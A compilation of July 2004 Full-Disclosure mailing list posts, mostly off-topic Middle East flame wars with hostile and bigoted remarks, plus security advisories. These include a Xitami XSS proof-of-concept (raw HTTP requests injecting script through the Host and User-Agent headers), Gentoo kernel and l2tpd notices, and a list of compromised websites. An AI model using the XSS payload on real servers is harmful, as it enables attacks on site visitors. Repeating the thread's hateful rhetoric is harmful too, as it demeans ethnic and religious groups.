Re: [Full-Disclosure] Hacking Challenge?

[a]

- Original Message - 
From: "Youssef JAD" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Wednesday, July 21, 2004 2:32 PM
Subject: Re: [Full-Disclosure] Hacking Challenge?


> Did you know that the statistics say that UNIX/Linux systems are more
> vulnerable than Windows 2003 Servers ?
> That's the reality, and you need to stick with it ;)

maybe i am feeding a troll, but i think that your statement is required to be backed 
up with some statistics and even they can made to say anything so somehow backed up 
with impartial ones with a source that can be cross checked ! otherwise such 
statements do not carry and weight and are not the reality

-aditya 

ÿÿ
éb½êÞvë"žaxZÞx÷«²‰Ú”Gb¶*'¡óŠ[kj¯ðÃæj)m­ªÿr‰ÿ

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[OT] Middle East (was Re: [Full-Disclosure] IE)

[J.A. Terranson]

On Thu, 22 Jul 2004, Rafel Ivgi, The-Insider wrote:

> You stupid man, how can you say that?!
> You know how it is to live in Israel?

I don't give a sh!t what it's like to live in Israel.  You don't like the
violence, then either work to stop it, or move.

> To go up on a bus hoping not to be bombed. Hoping every day that your
> sister, mother and father will not be bombed by terrorists. Living in
> fear knowing today when you will eat in that restaurant you may not go
> back home ?!

I know *exactly* what that's like now.  And it's because we support your
little country's killing regime that I am the recipient of that knowledge.
Because we have been stupid enough to stick our noses into your (and the
palestinians) dirty little war, we have become combatants, and by
extension, targets.  So now I too have to worry about the very same things
you do.

> to pay for your university high payments and high taxes
> because all of the country's cash is going for security.

I've got news for you Rafel: I have OUTRAGEOUSLY high taxes (48%) too.
Also because of  "all of the country's cash is going for
security"!


> I hate people who talk when they know nothing. Come live in Israel for 6
> month, lets see who is right, who is the murderer, lets see if you will
> even survive. Even my math tutor was murdered at a bombing, my sister
> got away by 2 minutes...you CANT IMAGINE how it is.

I don't want to live in Israel for 6 months, and I could care less how
awful it is: your two countries have decided to kill each other off - so
go do it.  But leave me out of it.  You want to die?  Do it on your own.
Don't demand that I pay for your weapons.  And while we're on that topic,
since I DO pay for your frigging weapons, you have ZERO right to
bitch that YOUR taxes are too high!  So, should we just raise the US
taxes a little more, to ease your burden?  What gives you the right
to demand that I lower YOUR taxes?

-- 
Yours,

J.A. Terranson
[EMAIL PROTECTED]
0xBD4A95BF

  "...justice is a duty towards those whom you love and those whom you do
  not.  And people's rights will not be harmed if the opponent speaks out
  about them."  Osama Bin Laden
- - -

  "There aught to be limits to freedom!"George Bush
- - -

Which one scares you more?

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] RE: mi2g - fud, lies and libel

[a]

> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> - --Tuesday, Thor Larholm [EMAIL PROTECTED] wrote to [EMAIL PROTECTED]


please dont spam the lists with all these useless info! 

ÿÿ
éb½êÞvë"žaxZÞx÷«²‰Ú”Gb¶*'¡óŠ[kj¯ðÃæj)m­ªÿr‰ÿ

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] A Popup! In Mozilla!

[Szilveszter Adam]

a wrote:
does it work with the latest version of mozilla ? 1.7 / 1.7.1 ?
Of course it does. Why shouldn't it?
Sz.
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] [OT] The Middle East Conundru

[Martin Wasson]

AMEN!  The argument con mucho gusto is refreshing, but outside the scope by a 
longshot.  It does, however, give me an idea.  What if we could get the Philistines 
and the Israelis to channel that anger into systematically bombing spammers into 
extinction?  H?  We could paint one of those swirling deals on an AWACS disc, 
hypnotize them all, call something like this:

spammers == infidels == muslims

while [ spammers -gt 0 ]
do
killall -9 spammers
done

The code may not be accurate, but you get the idea.  Sounds like a win-win, huh?

SMARTACVS

>>Instead of Full Disclosure [OT] 
>>How about sending it to a list that cares?
>>I don't read this list to get political insight.  I don't read it to
>>get religious discussions. 
>>Call me small minded, call me a zealot, whatever it is you call me; >>try, just try, 
>>to have it have a shred of security related to it.
>>Hopefully we can now return to our regularly scheduled _security_list.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Web Site Responsibility, we'll help!

[sans8732]

http://isc.sans.org/diary.php?date=2004-06-25

http://weblog.infoworld.com/foster/2004/07/17.html#a128

"From a consumer perspective, you'd like to see a Better Business
Bureau of the Internet where you can go find who has the best
security, but we're just not there yet," says Marcus Sachs, Director
of the Internet Storm Center of the SANS Institute. The compromised 

websites -- which he says included a number of well known sites but 

not, as rumored, biggies like eBay -- really aren't in a position to
identify themselves. "Culturally that's just not acceptable behavior
right now, and it would put the website at a great competitive
disadvantage. And it could expose the Internet to something akin to 

the malpractice lawsuits you see in the medical field, and that could
derail everything."


   Well known sites aren't in a position to identify themselves
   and take responsibility for their servers?  Here, courtesy of
   SANS, let me help them...


www.ardenb.com
www.armynavyshop.com 
www.armynavyshop.us  
www.auctionworks.com 
www.bankfinancial.com
www.baseballusa.com
www.berkshirehathaway.com  
www.ci.citrus-heights.ca.us
www.cruiseone.com
www.easternshorejobs.com
www.embassysuites.com
www.goldenram.com
www.gwinnettplacecid.com
www.hilton.com
www.hiltonhhonors.net
www.hookedonphonics.com  (it werked for me!)
www.hop.com  
www.ifc10.com
www.kbb.com 
www.kfuo.org
www.luggage-source.com
www.mda.org.au
www.pete.quallife.com
www.planetkc.com 
www.visualgov.com



Concerned about your privacy? Follow this link to get
secure FREE email: http://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/services-messenger?l=434

Promote security and make money with the Hushmail Affiliate Program: 
http://www.hushmail.com/about-affiliate?l=427

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [OT] Middle East (was Re: [Full-Disclosure] IE)

[roman . kunz]

at least lockheed martin will earn a hell lot of money and... hey, they 
are paying taxes in the US too. BUT sorry, i forgot, they have 
tax-reduction (check their product catalogue 
http://www.lockheedmartin.com/wms/findPage.do?dsp=fec&ci=9&rsbci=0&fti=126&ti=0&sc=400 
- it's amazing how many different kind of bombs one can build). 
btw, america is the biggest war supporter in the world; do you know why?

sorry for feeding...
---

I don't want to live in Israel for 6 months, and I could care less how
awful it is: your two countries have decided to kill each other off - so
go do it.  But leave me out of it.  You want to die?  Do it on your own.
Don't demand that I pay for your weapons.  And while we're on that topic,
since I DO pay for your frigging weapons, you have ZERO right to
bitch that YOUR taxes are too high!  So, should we just raise the US
taxes a little more, to ease your burden?  What gives you the right
to demand that I lower YOUR taxes?


*Disclaimer*
This message is for the addressee only and may contain confidential or privileged 
information. You must delete and not use it if you are not the intended recipient. It 
may not be secure or error-free. All e-mail communications to and from the Julius Baer 
Group may be monitored. Processing of incoming e-mails cannot be guaranteed. Any views 
expressed in this message are those of the individual sender. This message is for 
information purposes only. All liability of the Julius Baer Group and its entities for 
any damages resulting from e-mail use is excluded. US persons are kindly requested to 
read the important legal information presented after clicking here: 
http://www.juliusbaer.com/maildisclaimer

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Hacking Challenge?

[Charles Heselton]

> > Did you know that the statistics say that UNIX/Linux systems are more
> > vulnerable than Windows 2003 Servers ?
> > That's the reality, and you need to stick with it ;)
> 
I would have to concur with everything said after this post.  Where is
the link to the "statistics"?  What validation is there for the data? 
And if this is true..especially since linux took the #2 desktop OS
with 5% (yes 5%) of the population using it, are all/most of the
recent virii/trojans targeting unresolved Windows vulnerabilities? 
Um...I think I answered myself..1) greatest distribution, 2) most
vulnerable.

Just my 2¢.


-- 
Charlie Heselton
Network Security Engineer

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [OT] Middle East (was Re: [Full-Disclosure] IE)

[Daniel Hedblom]

Can we please move this discussion to another forum? I will gladly join in
but not here ok? As interesting as some of the comments are this is
probably not the right venue. Give me a link and i will flame yours truly
to kingdom come!

/cheers





> at least lockheed martin will earn a hell lot of money and... hey, they
> are paying taxes in the US too. BUT sorry, i forgot, they have
> tax-reduction (check their product catalogue
> http://www.lockheedmartin.com/wms/findPage.do?dsp=fec&ci=9&rsbci=0&fti=126&ti=0&sc=400
> - it's amazing how many different kind of bombs one can build).
> btw, america is the biggest war supporter in the world; do you know why?
>
> sorry for feeding...
> ---
>
> I don't want to live in Israel for 6 months, and I could care less how
> awful it is: your two countries have decided to kill each other off - so
> go do it.  But leave me out of it.  You want to die?  Do it on your own.
> Don't demand that I pay for your weapons.  And while we're on that topic,
> since I DO pay for your frigging weapons, you have ZERO right to
> bitch that YOUR taxes are too high!  So, should we just raise the US
> taxes a little more, to ease your burden?  What gives you the right
> to demand that I lower YOUR taxes?
>
>
> *Disclaimer*
> This message is for the addressee only and may contain confidential or
> privileged information. You must delete and not use it if you are not the
> intended recipient. It may not be secure or error-free. All e-mail
> communications to and from the Julius Baer Group may be monitored.
> Processing of incoming e-mails cannot be guaranteed. Any views expressed
> in this message are those of the individual sender. This message is for
> information purposes only. All liability of the Julius Baer Group and its
> entities for any damages resulting from e-mail use is excluded. US persons
> are kindly requested to read the important legal information presented
> after clicking here: http://www.juliusbaer.com/maildisclaimer
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>


-- 
--Disclaimer-
The expressions in this mail are my own.

Daniel Hedblom
Network Admin Mobile +46 70-383 72 44
Nipan School District Work   +46 620-68 26 38
Sweden




___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] [OT] The Middle East Conundrum

[Martin Wasson]

And before the name calling begins... Yes, I admit it.  I'm an antispamite.  I don't 
need a lower interest rate on my mortgage, a bigger schwanz, kiddie porn, or valium* 
shipped to my door, and I'm mad as hell!  (*Maybe Thorazine or Haloperidol, huh Alif?  
Heh heh. jk)

Now STOP arguing about the Middle East and get back to Securitah.  You are NEVER going 
to agree.  Now speaking of Securitah, and in the spirit of FD, how's about some source 
for the WiFi DSSS/CCA DOS.

--MW 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] antisemtism, FD and bandwidth - what I want out of it

[Gadi Evron]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
|>You should proof that Israel *deliberately* massacres civilians.
| http://www.informationclearinghouse.info/article3023.htm
|>Anyway, this is a security-related mailing list and antisemitism
|>and antizionism are off topic: please stop boring us.
| Agreed.  Go away zionist troll.
Did I ever mention how I enjoy drinking the blood of Palestinian babies
in the morning?
Yes, we are all murderers, now can we please move on?
Can't a guy kill babies in peace and quiet without being flamed on FD?

Moderators: this is not only off-topic (unlike zombies sending viruses
here), this is outrageous!
How about you add the address of everyone who participated in this
thread, including me just now, to an auto-moderation rule?
This is not the place for politics, and it certainly ain't the place for
crazy zealots on any side, or antisemitism. They can come to Israel and
stand before tanks if they like, or even bomb a few Israeli babies - but
don't you think this really is going over the line in FD?
This is absolutely the last time I feel like a lamer for replying to
flamers and flaming them back off-topic when I am really really bored.
As much as I appreciate and adore the idea behind FD, it has grown out
of being usable, nearly at all.
It's a shame as the grand idea that it is, got to just be ridiculed and
instead of providing with an alternative to the big bad corporate
bugtraq, it's just a kiddies play ground.
A list so big must be moderated. Can't there be a Full Disclosure list
where every on-topic email, no matter who would hate it, gets through?
Even if it is about how much Symantec isn't serious, for example? Or a
competitor releasing a patch? (did I get all the normal anti-bugtraq
claims?)
Can't it be professional rather than just a venting ground for those who
find it difficult to think faster than one mile an hour?
Note: Fine, keep this list the way it is - you already showed you won't
budge from that, I want another list which can serve an actual purpose
behind the ideology other than bogging bandwidth.
I want our ideology to be respected and successful. Not a waste of time.
Open source, Linux, etc. do so well in-spite of the multi-billion $$$
fight against them, and yet all we of the security world have is FD in
its current form.
Gadi Evron.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.3 (MingW32)
iD8DBQFA/3XhqH6NtwbH1FARAqyDAJ9UzrwfiC6lBuv96ZKqgr3pFnkLLQCdExip
1LQqJnon5G6jXSKyuc8sXtA=
=PeCn
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] [OT] The Middle East Conundrum

[J.A. Terranson]

On Thu, 22 Jul 2004, Martin Wasson wrote:

> And before the name calling begins... Yes, I admit it.  I'm an
> antispamite.  I don't need a lower interest rate on my mortgage, a
> bigger schwanz, kiddie porn, or valium* shipped to my door, and I'm mad
> as hell!  (*Maybe Thorazine or Haloperidol, huh Alif?  Heh heh. jk)

Hey, Marto.  This is a *SECURITY LIST*.  Kill the off topic posts, ok?

> --MW

:-)

-- 
Yours,

J.A. Terranson
[EMAIL PROTECTED]
0xBD4A95BF

  "...justice is a duty towards those whom you love and those whom you do
  not.  And people's rights will not be harmed if the opponent speaks out
  about them."  Osama Bin Laden
- - -

  "There aught to be limits to freedom!"George Bush
- - -

Which one scares you more?

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: mi2g - fud, lies and libel

[Thor]

> >including one clear hoax titled:  "Wendy's Drive-up Order System
> >Information Disclosure."

That was a hoax?  Whadda ya know... And all this time I was waiting for
mi2g's damage assessment follow-up.  I was sure we'd see a multi-billion
dollar estimate in global damages by such an atrocious implementation of a
drive-up ordering system.  What if someone saw an Atkin's family member
ordering French Fries from a Wendy's?  Or, heaven forbid, something that
actually had a bun??  That alone is worth millions, I'm sure.

But alas, that is why all good security people go to Burger King.  After
all, they're the ones with Spidey Sense.

T

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] antisemtism, FD and bandwidth - what I want out of it

[Raymond Morsman]

Citeren Gadi Evron <[EMAIL PROTECTED]>:

> Moderators: this is not only off-topic (unlike zombies sending
> viruses
> here), this is outrageous!

You are off-topic too.

The discussion whether FD should be moderated has been around forever,
in the hardest times.

This is an unmoderated list; it's not going to change the rules just
because you don't like the message. It merely is the trade-off of total
freedom of speech, which this list tries to maintain.


Raymond.

P.S. Remember: just because you can't hear them it doesn't mean the
thoughts are there. It's better to know your opponent than having a
secret enemy.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: OFF TOPIC: antisemitic troll

[Feher Tamas]

Anti-semites should not use the Internet, because TCP and UDP are 
the protocols of the elders of zion

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] antisemtism, FD and bandwidth - what I want out of it

[Gadi Evron]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Raymond Morsman wrote:
| Citeren Gadi Evron <[EMAIL PROTECTED]>:
|
|
|>Moderators: this is not only off-topic (unlike zombies sending
|>viruses
|>here), this is outrageous!
|
|
| You are off-topic too.
I agree, I stated as much.
| The discussion whether FD should be moderated has been around forever,
| in the hardest times.
Indeed. I am talking about Full Disclosure as an ideology, not this list.
| This is an unmoderated list; it's not going to change the rules just
| because you don't like the message. It merely is the trade-off of total
| freedom of speech, which this list tries to maintain.
Wrong, it is a mailing list for total freedom of speech for security.
Why not do that? If not here, somewhere else. Is all I am saying.
The message of FD is important. I only wish it was serious.
| P.S. Remember: just because you can't hear them it doesn't mean the
| thoughts are there. It's better to know your opponent than having a
| secret enemy.
:)
Gadi Evron.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.3 (MingW32)
iD8DBQFA/5eXqH6NtwbH1FARAqiJAJ0eDbnRnIjfXIvg/d8dbgRPEkDIuwCfXWOT
MtKvSGP0lZw4Yg9akrdpJsE=
=+gBk
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] antisemtism, FD and bandwidth - what I want out of it

[Harlan Carvey]

Raymond,

> It merely is the trade-off of total
> freedom of speech, which this list tries to
> maintain.

I agree with you on that.  One would hope that people
would realize that with free speech (and other
freedoms) comes responsibility...or at the very least,
observe some modicum of courtesy.  However, that very
little bit seems to be far too much to expect.  

Consider this...this is a public list and people will
knowing post off-topic.  Sometimes they'll even say,
"hey, this is off topic".  Now, what would happen if
you were sitting around having a couple of beers w/
your buddies and a friend of yours walked up and just
started talking about something that hand nothing
whatsoever to do with what you and your buds were
talking about?  Would you be the one to do that to
your friends?  How about a group of strangers?

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] IE

[Pablo]

Eyh!!! There are a lot of people that think that Israel deliberately
massacres civilians, with their bombs an IDF. 
That is a fact. And they are doing that I believe.



- Original Message -
From: "whiplash" <[EMAIL PROTECTED]>
To: <>
Sent: Wednesday, July 21, 2004 7:36 PM
Subject: RE: [Full-Disclosure] IE


> J.A. Terranson wrote:
>
> > Any country that deliberately massacres civilians is, by definition,
> > guilty of genocide.
>
> You should proof that Israel *deliberately* massacres civilians.
> On the other side, anyone can easily demonstrate that Hamas and the so
> called Al Qaeda *deliberately* massacres civilians.
>
> Anyway, this is a security-related mailing list and antisemitism
> and antizionism are off topic: please stop boring us.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] XSS in Xitami testssi.ssi

[[EMAIL PROTECTED]]

Xitami Imatix testssi.ssi XSS
=
Xitami is an easy to use and open source webserver, running on several
platforms.
What?
=
Xitami Imatix 2.5c1 comes with the SSI test page /testssi.ssi, which
delivers
a website with the content of several SSI-variables.
Within the variables "HTTP_USER_AGENT" and "HTTP_REFERER", no
(sufficient) content
checking is done. The content of this variables is delivered by the
webbrowser, and
therefore can be manipulated by the user.
How?

Telnet (dont netcat!) to port 80:
GET /testssi.ssi HTTP/1.1
Host: localhost
User-Agent: PLEASE CLICK HERE
Connection: close
GET /testssi.ssi HTTP/1.1
Host: alert("Please click at \"PLEASE CLICK HERE\"")
User-Agent: PLEASE CLICK HERE
Connection: close
Misc:
=
This_paper: www.oliverkarow.de/research/xitami25c1_testssi_XSS.txt
Screenshot: www.oliverkarow.de/research/xitami25c1_1.GIF
Screenshot: www.oliverkarow.de/research/xitami25c1_2.GIF
Version: 2.5c1 on Windows platform  others not tested
Vendor: www.imatix.com
Date: 22.07.2004

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] multiple web browsers, multiple bugs - onUnload and location.href

[Rudolf Polzer]

WARNING: please open a new browser instance for it.

Try http://www.informatik.uni-frankfurt.de/~polzer/rbiclan/location

The page is SUPPOSED to prevent going to somewhere else by changing
the URL back in onUnload (even that is already a reason to disable
JavaScript).

The interesting part is: depending on browser, you see different bugs.

Konqueror: an endless loop of alert boxes, seems to have crashed GNOME
(killing konqueror did not make GNOME usable).

Mozilla, Netscape 7 or Firefox: almost works correctly. Except for two
small bugs: View source shows the source of Google or where you TRIED
to go to, while you SEE the unload-trap page. The other bug: when you
close the browser window, onUnload is executed TWICE (you see two
alert boxes, with the number increasing) and the new page is loaded,
but not displayed. But the view-source bug somehow looks suspicious.
Do other parts of Mozilla think it was another website too?

IE (according to someone on IRC, not verified by me): seems to work
perfectly. For one time. Sometimes it goes to google, displays Google,
but shows the www.informatik.uni-frankfurt.de URL in the location bar.
Entering a search expression then uses the wrong domain name. Could
perhaps be used for reading content from "foreign" web sites, didn't
try.

Netscape 4: seems to work perfectly, no view-source bug or similar.
Until you close the browser window, where it becomes an endless alert
loop.

Opera: works perfectly, no bugs found. Except for that this is evil.

Links2: does not support onUnload (good thing!), therefore seems not
to be vulnerable. However, do not expect a browser that crashed on
"var i = 203; ''.charAt(i);" where 203 was a "magic number" and whose
source has variables and comments in Czech only. It took them long to
fix that bug I reported, but at least they finally did it. Even
though, that made me change to w3m.

Except for IE no "big holes" seem to be possible with that. However,
it proves that onUnload is evil (we already know that) and perhaps
shows new, perhaps unknown until now, browser bugs that may lead to
something exploitable. Have fun!

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re[2]: [Full-Disclosure] IE

[partysan_FFF]

P> Eyh!!! There are a lot of people that think that Israel deliberately
P> massacres civilians, with their bombs an IDF. 
P> That is a fact. And they are doing that I believe.

Guys, lets try and not turn this SECURITY mailing list into a
political debate group.  There are plenty of forums for that all over
the web.  If you want to discuss politics, you are very welcome to do
so, but please do it in the appropiate places and not his list.

Thank you.


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] [ GLSA 200407-16 ] Linux Kernel: Multiple DoS and permission vulnerabilities

[Tim Yamin]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200407-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  Severity: High
 Title: Linux Kernel: Multiple DoS and permission vulnerabilities
  Date: July 22, 2004
  Bugs: #56171, #56479
ID: 200407-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis

Multiple permission vulnerabilities have been found in the Linux
kernel, allowing an attacker to change the group IDs of files mounted
on a remote filesystem (CAN-2004-0497), as well as an issue in 2.6
series kernels which allows /proc permissions to be bypassed.
A context sharing vulnerability in vserver-sources is also handled by
this advisory as well as CAN-2004-0447, CAN-2004-0496 and
CAN-2004-0565. Patched, or updated versions of these kernels have been
released and details are included along with this advisory.
Background
==
The Linux kernel is responsible for managing the core aspects of a
GNU/Linux system, providing an interface for core system applications
as well as providing the essential structure and capability to access
hardware that is needed for a running system.
Affected packages
=
---
 Kernel /  Unaffected  /   Remerge
---
  1  aa-sources . *>= 2.4.23-r2 .. YES
 . >= 2.6.5-r5 ... YES
  2  alpha-sources .. >= 2.4.21-r9 ...
  3  ck-sources . *>= 2.4.26-r1 .. YES
 . >= 2.6.7-r5 ... YES
  4  compaq-sources ... >= 2.4.9.32.7-r8 .
  5  development-sources  >= 2.6.8_rc1 ...
  6  gentoo-dev-sources .. >= 2.6.7-r8 ...
  7  gentoo-sources  *>= 2.4.19-r18 ..
 ... *>= 2.4.20-r21 ..
 ... *>= 2.4.22-r13 ..
  *>= 2.4.25-r6 ..
  >= 2.4.26-r5 ...
  8  grsec-sources  >= 2.4.26.2.0-r6 .
  9  gs-sources ... >= 2.4.25_pre7-r8 
 10  hardened-dev-sources  >= 2.6.7-r2 ...
 11  hardened-sources ... >= 2.4.26-r3 ...
 12  hppa-dev-sources .. >= 2.6.7_p1-r2 ..
 13  hppa-sources .. >= 2.4.26_p6-r1 .
 14  ia64-sources ... >= 2.4.24-r7 ...
 15  mm-sources .. >= 2.6.7-r6 ...
 16  openmosix-sources .. >= 2.4.22-r11 ..
 17  pac-sources  >= 2.4.23-r9 ...
 18  planet-ccrma-sources ... >= 2.4.21-r11 ..
 19  pegasos-dev-sources . >= 2.6.7-r2 ...
 20  pegasos-sources  >= 2.4.26-r3 ...
 21  ppc-sources  >= 2.4.26-r3 ...
 22  rsbac-sources .. >= 2.4.26-r3 ...
 23  rsbac-dev-sources ... >= 2.6.7-r2 ...
 24  selinux-sources  >= 2.4.26-r2 ... YES
 25  sparc-sources .. >= 2.4.26-r3 ...
 26  uclinux-sources .. *>= 2.4.26_p0-r3 .
 ... >= 2.6.7_p0-r2 ..
 27  usermode-sources ... *>= 2.4.24-r6 ..
  *>= 2.4.26-r3 ..
 . >= 2.6.6-r4 ...
 28  vserver-sources .. >= 2.4.26.1.28-r1 
 29  win4lin-sources  *>= 2.4.26-r3 ..
 . >= 2.6.7-r2 ...
 30  wolk-sources  *>= 4.9-r10 ...
 . *>= 4.11-r7 ...
 . >= 4.14-r4 
 31  xbox-sources ... *>= 2.4.26-r3 ..
 . >= 2.6.7-r2 ...
 32  mips-sources  Vulnerable! ...
 33  vanilla-sources . Vulnerable! ...
---

[Full-Disclosure] [ GLSA 200407-17 ] l2tpd: Buffer overflow

[Kurt Lieber]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200407-17
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: l2tpd: Buffer overflow
  Date: July 22, 2004
  Bugs: #53009
ID: 200407-17

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


A buffer overflow in l2tpd could lead to remote code execution. It is
not known whether this bug is exploitable.

Background
==

l2tpd is a GPL implentation of the Layer 2 Tunneling Protocol.

Affected packages
=

---
 Package   /   Vulnerable   /   Unaffected
---
  1  net-dialup/l2tpd   < 0.69-r2   >= 0.69-r2

Description
===

Thomas Walpuski discovered a buffer overflow that may be exploitable by
sending a specially crafted packet. In order to exploit the vulnerable
code, an attacker would need to fake the establishment of an L2TP
tunnel.

Impact
==

A remote attacker may be able to execute arbitrary code with the
privileges of the user running l2tpd.

Workaround
==

There is no known workaround for this vulnerability.

Resolution
==

All users are recommended to upgrade to the latest stable version:

# emerge sync

# emerge -pv ">=net-l2tpd-0.69-r2"
# emerge ">=net-l2tpd-0.69-r2"

References
==

  [ 1 ] CAN-2004-0649
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0649
  [ 2 ] Full Disclosure Report
http://seclists.org/lists/fulldisclosure/2004/Jun/0094.html

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200407-17.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0


pgpSOGPAZvGwC.pgp
Description: PGP signature

Re: [Full-Disclosure] antisemtism, FD and bandwidth - what I want out of it

[Maarten]

On Thursday 22 July 2004 13:07, Harlan Carvey wrote:

> Consider this...this is a public list and people will
> knowing post off-topic.  Sometimes they'll even say,
> "hey, this is off topic".  Now, what would happen if
> you were sitting around having a couple of beers w/
> your buddies and a friend of yours walked up and just
> started talking about something that hand nothing
> whatsoever to do with what you and your buds were
> talking about?  Would you be the one to do that to
> your friends?  How about a group of strangers?

Except that in that social context you cannot really say there is no 
moderation.  Moderation will not be official, sure, but body language, 
awkward looks and maybe a wisecrack or two will most of the time quickly shut 
up that person.  Or they will continue their conversation in a smaller 
circle, all things that are impossible or at least difficult to do on a ML. 
On a mailinglist you can continue off-list, but that is a one-to-one 
conversation, not a fork like you can have in your bar scenario.
Also, if the guy won't stop jabbing, you can all start to leave and continue 
elsewhere.  This doesn't happen on mailinglists, or at the very least it is a 
process that takes months to complete, instead of seconds.

To steer a little bit back to on-topic, can we conclude that all computer 
systems in israel and the surrounding palestine territories are insecure ?
Because, since all real security begins with _physical_ security, one can 
easily argue that all those systems are notorously insecure.  ;-)

Maarten

-- 
Yes of course I'm sure it's the red cable. I guarante[^%!/+)F#0c|'NO CARRIER

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] Vulnerability in sourceforge.net

[Todd Towles]

Sounds like they should have configured that page a bit different...made it
run under a little less access...or said I say..it is a mis-configuration.
=)

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Dan Duplito
Sent: Wednesday, July 21, 2004 6:37 PM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Vulnerability in sourceforge.net

> nicolas vigier <[EMAIL PROTECTED]> wrote:
>
> It's not a mis-configuration, this does not allow you to look at any
> secret file, only the files that the user nobody can read.

well, user "nobody" has shell access (/bin/sh) and is allowed read access to
/etc/passwd file and probably other system files as well.

i'm wondering if the discoverer (Alexander) already informed the authors of
the app...

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Physical access exploit: Apple iTunes Visualiser disables screen lock

[Adam Q]

The full-screen Apple iTunes Visualiser currently disables the screen 
lock timer on both Mac & PC.

Synopsis:
This a physical access security concern at present since anybody who 
uses the iTunes Visualiser in full-screen mode is essentially leaving 
their PC unlocked for that duration. Since many people leave the 
Visualiser on in office or POS situations this leads to a computer that 
can easily be accessed as the local user.

Suggested workaround:
Never leave a computer running iTunes Visualiser in full-screen mode 
unattended. Never deploy a computer with iTunes installed in a POS 
situation, and carefully consider the ramifications on the IT Security 
Policy in an office environment.

Recommended action:
Have the default be to lock the screen after the required time elapsed 
(exactly as if the screensaver became enabled) and have a preference to 
disable screen locking if the user wishes. Most users (and IT 
departments) would assume if they had screen locking enabled for their 
screensaver that they would be safe.


iTunes is a registered trademark of Apple Computer Corp.
---
Adam Q Salter
[EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] [ GLSA 200407-18 ] mod_ssl: Format string vulnerability

[Kurt Lieber]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
